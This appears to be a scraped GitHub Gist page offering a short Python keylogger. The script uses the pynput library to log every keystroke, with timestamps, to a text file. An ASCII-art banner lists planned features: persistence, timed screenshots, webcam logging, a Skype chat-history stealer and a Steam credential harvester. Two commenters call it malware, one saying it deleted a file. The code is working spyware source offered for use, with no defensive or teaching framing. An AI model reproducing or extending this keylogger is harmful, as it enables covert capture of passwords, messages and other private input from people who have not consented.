__ ____ ____ ____ ____ ____ ____ ____ _ _ | | | | | | _____ _ _| | ___ __ _ __ _ ___ _ __ | |/ / _ \ | | | |/ _ \ / _` |/ _` |/ _ \ '__| | < __/ |_| | | (_) | (_| | (_| | __/ | |_|\_\___|\__, |_|\___/ \__, |\__, |\___|_| __/ | __/ | __/ | |___/ |___/ |___/ __ ____ ____ ____ ____ ____ ____ ____ --> For windows only ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ _____ _ _ _ _ |_ _| | (_) | | | | | | | |__ _ _ __ __ _ ___ | |_ ___ __ _____ _ __| | __ ___ _ __ | | | '_ \| | '_ \ / _` / __| | __/ _ \ \ \ /\ / / _ \| '__| |/ / / _ \| '_ \ | | | | | | | | | | (_| \__ \ | || (_) | \ V V / (_) | | | < | (_) | | | | \_/ |_| |_|_|_| |_|\__, |___/ \__\___/ \_/\_/ \___/|_| |_|\_\ \___/|_| |_| __/ | |___/ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ --> Persistance --> Taking screenshots after a specific time. Making it keystrokes independent. --> Webcam logging --> Skype chat history stealer --> Steam credential harvestor
Last active
December 31, 2024 17:25
-
-
Save Ishaan28malik/66b4e828f7c83027f576c749fa034ccf to your computer and use it in GitHub Desktop.
Python Projects
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pynput.keyboard import Key, Listener | |
import logging | |
log_dir = "" | |
logging.basicConfig(filename=(log_dir + "key_log2.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') | |
def on_press(key): | |
logging.info(str(key)) | |
with Listener(on_press=on_press) as listener: | |
listener.join() |
bro ur code delete my file wth?
bhai ur hacker this is malware attacks on my pc
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
keylogger
for running this program you need to install pynput module